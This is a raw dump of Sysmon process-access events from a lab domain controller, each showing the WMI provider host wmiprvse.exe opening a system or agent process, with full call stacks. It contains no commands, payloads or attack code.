15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025879Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025878Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025877Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025876Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025875Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:33.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025874Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 